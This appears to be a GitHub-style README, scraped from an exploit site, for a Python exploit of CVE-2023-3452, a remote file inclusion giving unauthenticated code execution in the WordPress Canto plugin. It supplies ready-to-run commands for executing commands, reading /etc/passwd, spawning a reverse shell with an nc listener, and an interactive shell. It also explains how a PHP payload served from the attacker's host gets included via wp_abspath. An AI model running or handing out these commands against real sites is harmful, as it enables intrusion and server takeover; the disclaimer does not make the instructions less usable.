## https://sploitus.com/exploit?id=A02E0041-D609-5695-B314-D21B78161F8A
# CVE-2023-3452 - WordPress Canto Plugin RCE
Exploit for the WordPress Canto Plugin (β€ 3.0.4) RFI vuln. **Actually works on HTTPS** β the other public PoCs kinda gave up on SSL.
*Credit where it's due: this CVE was found by others. I just made a version that doesn't break on HTTPS targets.*
## Vulnerability
| | |
|---|---|
| **CVE** | CVE-2023-3452 |
| **EDB-ID** | [51826](https://www.exploit-db.com/exploits/51826) |
| **Type** | Remote File Inclusion (RFI) β Unauthenticated RCE |
| **Affected** | WordPress Canto Plugin -l -p [OPTIONS]
```
### Arguments
| Option | Description | Required |
|--------|-------------|----------|
| `-t`, `--target` | Target WordPress URL (HTTP or HTTPS) | Yes |
| `-l`, `--lhost` | Your IP β target needs to reach this for the payload | Yes |
| `-p`, `--lport` | Payload server port (default: 8888) | No |
| `-c`, `--command` | Command to run on target | No* |
| `--revshell` | Spawn reverse shell | No |
| `--shell-port` | Listener port for rev shell (default: 4444) | No |
| `-i`, `--interactive` | Interactive shell mode | No |
| `-v`, `--verbose` | Extra output | No |
| `--skip-check` | Skip the vuln check | No |
\* No command = runs `id; whoami; hostname` as a sanity check
### Examples
**Single command:**
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"
```
**Read a file:**
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"
```
**Reverse shell** (run `nc -lvnp 4444` first):
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444
```
**Interactive mode:**
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i
```
**HTTPS CTF target:**
```bash
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"
```
## How It Works
1. **Check** β Hits `/wp-content/plugins/canto/readme.txt`, parses version (β€ 3.0.4 = vulnerable)
2. **Payload** β Writes a fake `wp-admin/admin.php` that runs your command via `system()`
3. **Serve** β Spins up a local HTTP server so the target can fetch our file
4. **Trigger** β Requests `download.php` with `wp_abspath=http://LHOST:LPORT` so it includes our remote PHP
5. **Execute** β Their server runs our code, we get the output back
## Network Notes
- Target must be able to reach your machine on `LHOST:LPORT` (for HTB/labs, thatβs your VPN IP)
- Firewall needs to allow inbound on the payload port (`-p`)
## Disclaimer
Authorized testing and education only. Only touch systems youβre allowed to. Anything else is illegal.
## License
MIT